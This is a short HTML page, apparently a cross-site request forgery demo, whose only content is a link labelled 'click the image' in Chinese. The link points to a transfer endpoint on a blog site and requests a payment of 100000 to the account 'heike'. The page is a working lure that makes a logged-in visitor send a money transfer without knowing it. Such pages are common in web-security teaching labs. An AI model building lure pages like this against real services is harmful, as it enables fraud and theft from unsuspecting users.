<!DOCTYPE html>
<html lang="en">
	<head>
		<title></title>
		<meta charset="UTF-8">
		<meta name="viewport" content="width=device-width, initial-scale=1">
		<!-- <link href="css/style.css" rel="stylesheet"> -->
	</head>
	<body>
	  <a href="https://blog-y.herokuapp.com/transfer/pay?account='heike'&money=100000">点击图片</a>
	</body>
</html>